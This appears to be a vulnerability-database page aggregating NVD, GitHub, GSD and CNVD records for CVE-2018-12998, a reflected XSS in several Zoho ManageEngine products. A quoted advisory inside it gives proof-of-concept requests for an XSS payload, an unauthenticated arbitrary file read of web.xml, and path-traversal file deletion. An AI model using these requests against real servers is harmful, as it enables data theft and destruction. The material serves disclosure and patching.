    "data": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. plural Zoho ManageEngine The product contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. There are cross-site scripting vulnerabilities in many ZOHO products. This issue has been reported to the vendor who has already published patches for this issue. \nhttps://www.manageengine.com/products/applications_manager/issues.html\n\n\n==========================\nAdvisory:Zoho manageengine Applications Manager Reflected XSSVulnerability\nAuthor: M3 From DBAppSecurity\nAffected Version: All\n==========================\nProof of Concept:\n==========================\n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script\n\n\nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me\n\n\n==========================\nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products\nAuthor: M3 From DBAppSecurity\nAffected Products:\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\n==========================\nProof of Concept:\n==========================\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx\n\n\nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. \n\n\n\n\n==========================\nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion\nAuthor: M3 From DBAppSecurity\nAffected Products:Desktop Central\n==========================\nProof of Concept:\n==========================\n\n\nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif\n\n\nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-12998"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      },
      {
        "db": "VULHUB",
        "id": "VHN-123013"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12998"
      },
      {
        "db": "PACKETSTORM",
        "id": "148635"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-12998",
        "trust": 2.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-036",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "148635",
        "trust": 1.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006785",
        "trust": 0.8
      },
      {
        "db": "VULHUB",
        "id": "VHN-123013",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12998",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-123013"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12998"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      },
      {
        "db": "PACKETSTORM",
        "id": "148635"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-036"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12998"
      }
    ]
  },
  "id": "VAR-201806-1164",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-123013"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-02-13T22:38:58.124000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.manageengine.com/"
      },
      {
        "title": "Multiple ZOHO Fixes for product cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81655"
      },
      {
        "title": "Kenzer Templates [5170] [DEPRECATED]",
        "trust": 0.1,
        "url": "https://github.com/arpsyndicate/kenzer-templates "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2018-12998"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-036"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-123013"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12998"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://github.com/unh3x/just4cve/issues/10"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2018/jul/75"
      },
      {
        "trust": 1.8,
        "url": "http://packetstormsecurity.com/files/148635/zoho-manageengine-13-13790-build-xss-file-read-file-deletion.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.cnnvd.org.cn/web/xxk/ldxqbyid.tag?cnnvd=cnnvd-201807-036"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12998"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12998"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/79.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/arpsyndicate/kenzer-templates"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12999"
      },
      {
        "trust": 0.1,
        "url": "https://www.manageengine.com/products/applications_manager/issues.html"
      },
      {
        "trust": 0.1,
        "url": "http://opmanager.helpdocsonline.com/read-me"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12997"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12996"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-123013"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12998"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      },
      {
        "db": "PACKETSTORM",
        "id": "148635"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-036"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12998"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-123013"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12998"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      },
      {
        "db": "PACKETSTORM",
        "id": "148635"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-036"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12998"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-06-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-123013"
      },
      {
        "date": "2018-06-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-12998"
      },
      {
        "date": "2018-08-31T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      },
      {
        "date": "2018-07-22T17:22:56",
        "db": "PACKETSTORM",
        "id": "148635"
      },
      {
        "date": "2018-07-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201807-036"
      },
      {
        "date": "2018-06-29T12:29:00.500000",
        "db": "NVD",
        "id": "CVE-2018-12998"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-08-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-123013"
      },
      {
        "date": "2023-12-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-12998"
      },
      {
        "date": "2018-08-31T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      },
      {
        "date": "2021-09-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201807-036"
      },
      {
        "date": "2023-12-07T20:06:40.657000",
        "db": "NVD",
        "id": "CVE-2018-12998"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-036"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural  Zoho ManageEngine Product cross-site scripting vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "148635"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-036"
      }
    ],
    "trust": 0.7
  }
}

FKIE_CVE-2018-12998

Vulnerability from fkie_nvd - Published: 2018-06-29 12:29 - Updated: 2024-11-21 03:46

Severity ?

6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Summary

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html	Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	http://seclists.org/fulldisclosure/2018/Jul/75	Exploit, Mailing List, Third Party Advisory
cve@mitre.org	http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036	Exploit, Third Party Advisory
cve@mitre.org	https://github.com/unh3x/just4cve/issues/10	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2018/Jul/75	Exploit, Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/unh3x/just4cve/issues/10	Exploit, Third Party Advisory

Impacted products

Vendor	Product	Version
zohocorp	firewall_analyzer	-
zohocorp	manageengine_netflow_analyzer	-
zohocorp	manageengine_network_configuration_manager	-
zohocorp	manageengine_opmanager	-
zohocorp	manageengine_oputils	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DFC3545-5EE0-4722-BFB6-58B3AF246F87",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "0940949F-4EB4-460B-8CE9-56B6387250F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA1C4C73-FD72-4EE7-BE63-D83C373E6A3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:zohocorp:manageengine_opmanager:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "91373406-389A-404C-81A1-BA994B0C06DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:zohocorp:manageengine_oputils:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "0AE5990D-D4B9-4D55-B221-20A9BF765C0A",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad Cross-Site Scripting (XSS) reflejado en Zoho ManageEngine Netflow Analyzer antes de la build 123137, Network Configuration Manager antes de la build 123128, OpManager antes de la build 123148, OpUtils antes de la build 123161, y Firewall Analyzer antes de la build 123147 permite a los atacantes remotos inyectar scripts web o HTML arbitrarios a trav\u00e9s del par\u00e1metro \"operation\" en /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet."
    }
  ],
  "id": "CVE-2018-12998",
  "lastModified": "2024-11-21T03:46:13.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.1,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-06-29T12:29:00.500",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2018/Jul/75"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/unh3x/just4cve/issues/10"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2018/Jul/75"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/unh3x/just4cve/issues/10"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-2PW8-R6J9-6VM6

Vulnerability from github – Published: 2022-05-13 01:06 – Updated: 2022-05-13 01:06

Details

Severity ?

6.1 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2018-12998"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-06-29T12:29:00Z",
    "severity": "MODERATE"
  },
  "details": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.",
  "id": "GHSA-2pw8-r6j9-6vm6",
  "modified": "2022-05-13T01:06:56Z",
  "published": "2022-05-13T01:06:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12998"
    },
    {
      "type": "WEB",
      "url": "https://github.com/unh3x/just4cve/issues/10"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2018/Jul/75"
    },
    {
      "type": "WEB",
      "url": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GSD-2018-12998

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2018-12998

Aliases

CVE-2018-12998

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2018-12998",
    "description": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.",
    "id": "GSD-2018-12998",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2018-12998"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2018-12998"
      ],
      "details": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.",
      "id": "GSD-2018-12998",
      "modified": "2023-12-13T01:22:29.920017Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2018-12998",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"
          },
          {
            "name": "https://github.com/unh3x/just4cve/issues/10",
            "refsource": "MISC",
            "url": "https://github.com/unh3x/just4cve/issues/10"
          },
          {
            "name": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036",
            "refsource": "MISC",
            "url": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036"
          },
          {
            "name": "20180720 [CVE-2018-12998]Zoho manageengine Reflected XSS in multiple Products",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2018/Jul/75"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_opmanager:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_oputils:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-12998"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-79"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/unh3x/just4cve/issues/10",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://github.com/unh3x/just4cve/issues/10"
            },
            {
              "name": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036"
            },
            {
              "name": "20180720 [CVE-2018-12998]Zoho manageengine Reflected XSS in multiple Products",
              "refsource": "FULLDISC",
              "tags": [
                "Exploit",
                "Mailing List",
                "Third Party Advisory"
              ],
              "url": "http://seclists.org/fulldisclosure/2018/Jul/75"
            },
            {
              "name": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 8.6,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": true
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      },
      "lastModifiedDate": "2023-12-07T20:06Z",
      "publishedDate": "2018-06-29T12:29Z"
    }
  }
}

CNVD-2018-17621

Vulnerability from cnvd - Published: 2018-09-05

Title

多款ZOHO产品跨站脚本漏洞

Description

ZOHO ManageEngine Netflow Analyzer等都是美国卓豪（ZOHO）公司的产品。ZOHO ManageEngine Netflow Analyzer是一套基于Web的带宽监控工具。Network Configuration Manager是一套用于配置交换机、路由器、防火墙和其他网络设备的网络配置管理、网络变更和配置管理（NCCM）软件。多款ZOHO产品中存在跨站脚本漏洞。远程攻击者可通过向/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet URL发送‘operation’参数利用该漏洞注入任意的Web脚本或HTML。

Severity

中

Patch Name

多款ZOHO产品跨站脚本漏洞的补丁

Patch Description

Formal description

目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页： https://www.manageengine.com/

Reference

https://nvd.nist.gov/vuln/detail/CVE-2018-12998

Impacted products

Name
['ZOHO ManageEngine Netflow Analyzer <build 123137', 'ZOHO ManageEngine Network Configuration Manager <build 123128', 'ZOHO ManageEngine OpManager <build 123148', 'ZOHO ManageEngine OpUtils <build 123161']

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2018-12998",
      "cveUrl": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12998"
    }
  },
